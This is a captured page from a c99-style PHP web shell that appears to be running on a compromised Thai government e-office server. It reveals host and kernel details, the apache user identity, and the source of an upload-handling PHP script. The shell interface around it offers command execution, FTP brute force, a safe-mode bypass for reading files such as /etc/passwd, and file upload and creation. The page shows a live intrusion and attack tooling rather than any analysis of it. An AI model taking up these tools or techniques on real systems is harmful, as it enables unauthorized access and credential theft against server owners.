!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/mistk/eoffice/admin/   drwxr-xr-x
Free 50.9 GB of 127.8 GB (39.83%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processAddDocAtt.php (4.62 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once("../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../link/function.php";
include_once 
"../link/functionshow.php";
include_once 
"../class/clsDocType.php";
include_once 
"../class/clsDocattatchesTmp.php";
include_once 
"../class/clsDocuments.php";
include_once 
"../class/clsRunningDoc.php";
include_once 
"../class/clsDocattatches.php";
include_once 
"../class/clsDocReceiveSend.php";
include_once 
"../class/clsSysConfig.php";
include_once 
"../class/clsDepartment.php";
include_once 
"../link/keyThai.php";
include_once 
"../class/clsSysConfig.php";
include_once 
"funct.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDt = new doctype($oC);
$oDt1 = new doctype($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDatt = new Docattatches($oC);
$oDatt2 = new Docattatches($oC);
$oDatt3 = new Docattatches($oC);
$oDatt1 = new Docattatches($oC);
$oDoc = new Documents($oC);
$oDoc1 = new Documents($oC);
$oRd = new runningdoc($oC);
$oRd1 = new runningdoc($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs2 = new DocReceiveSend($oC);
$oSys = new sysConfig($oC);
$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oSys = new sysConfig($oC);
if(
$method=="uploadfile"){

    
//----------add DocAttatches 
            
echo 'file-'.$file $_FILES['fileupload']['name'];
            echo 
'sizefile-'.$sizefile $_FILES['fileupload']['size']; 
            
$filetype=strstr($file,'.');
            
$str $file;    
            
$len=strlen($str);
            
$count=0;  
            for(
$i=0$i<$len$i++){  
                
//echo $str{$i}."<br>"; 
                
$asci=ord($str{$i});
                if(
$asci == 46){
                    
$count++;
                } 
                if(
$asci == 44){
                    
$count++;
                }
            }
            
$oSys->RSsysConfig();
            
$oSys->GetRecord();
            
$oSys->filesizebyte;
            
$sizefileM=($oSys->filesizebyte/1024/1024);
            if(
$count>1){
                        
?><script>window.alert("ชื่อแฟ้มไม่ควรจะประกอบด้วย จุด(.) และ , กรุณาเปลี่ยนชื่อแฟ้ม");</script><?                    
            
}else if($sizefile>$oSys->filesizebyte || $sizefile==0){  //--- 2 MB , 2048 KB
                        
?><script>window.alert("ขนาดแฟ้มไม่เกิน <?  echo $sizefileM?> MB");</script><?
                        
echo "<body onload=\"document.forms[0].submit();\">";
            }else if(
$filetype!='.doc' && $filetype!='.xls' && $filetype!='.ppt' && $filetype!='.zip' && $filetype!='.rar' && $filetype!='.odt' && $filetype!='.ods' && $filetype!='.odp' && $filetype!='.pdf' && $filetype!='.jpg' && $filetype!='.gif' && $filetype!='.jpeg' && $filetype!='.png' && $filetype!='.DOC' && $filetype!='.XLS' && $filetype!='.PPT' && $filetype!='.ZIP' && $filetype!='.RAR' && $filetype!='.ODT' && $filetype!='.ODS' && $filetype!='.ODP' && $filetype!='.PDF' && $filetype!='.JPG' && $filetype!='.GIF' && $filetype!='.JPEG' && $filetype!='.PNG'){  
                        
?><script>window.alert("ไม่สามารถอัพโหลดแฟ้มนามสกุล <?  echo $filetype?> ได้");</script><?                        
            
}else{
                        
$timedoc=date('Ymd_His');
                        
$typefile $_FILES['fileupload']['type']; 
                        
$sizefile $_FILES['fileupload']['size']; 
                        list(
$aa$dot) = preg_split("/\./"$file);
                        
$filenamemd5=md5($file);
                        
$tempfile "../documents/".$timedoc."-".$DlcID."-".$filenamemd5.".".$dot;
                    
                        
copy($_FILES['fileupload']['tmp_name'],$tempfile);
                                
//----search DaSeq of DocID
                                
$MaxDaSeq=$oDatt1->SearchMaxDaSeqDocID($searchDoc);
                                
                                
$oDatt->AddNew();
                                
$oDatt->DaID=$oDatt->GetNextCode();
                                
$oDatt->DocID=$searchDoc;
                                
$oDatt->DaFileName=$_FILES['fileupload']['name'];
                                
$oDatt->DaUpFileName=$timedoc."-".$DlcID."-".$filenamemd5.".".$dot;
                                
                                if(
$oDatt3->SearchByDaSeqCount0($searchDoc)==0){
                                    
$oDatt->DaSeq=$MaxDaSeq+1;
                                }else{
                                    
$oDatt->DaSeq=0;
                                }
                                
$oDatt->DaAddNew='Y';
                                
                                
$flagCommit $oDatt->Save();
                                
                                if(
$flagCommit)
                                    
$oC->CommitTrans();
                                else
                                    
$oC->RollbackTrans();        
            }
        
?>
        <script language="JavaScript">
        parent.location.href ="showSendDoc.php?page_id2=<? echo $page_id2;?>&DocID=<?  echo $DocID?>&DrsID=<?  echo $DrsID?>&folderstaff2=<? echo $folderstaff2;?>&forfolderstaff2=<? echo $forfolderstaff2;?>";
        </script>
<?
}else if($method=="delfile"){
    
$oDatt->SearchByKey($DtmpID);
    
$oDatt->GetRecord();
    
unlink("../documents/$oDatt->DaUpFileName");
    
$oDatt->Delete();
    
    
$oDatt2->SearchByDocIDMoreDaSeq($oDatt->DocID,$oDatt->DaSeq);
    while(
$oDatt2->GetRecord()){
        
$oDatt2->Edit();
        
$oDatt2->DaSeq=$oDatt2->DaSeq-1;
        
$oDatt2->Save();    
    }
        
?>
        <script language="JavaScript">
        parent.location.href ="showSendDoc.php?page_id2=<? echo $page_id2;?>&DocID=<?  echo $DocID?>&DrsID=<?  echo $DrsID?>";
        </script>
<?
}
?>
        

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.011 ]--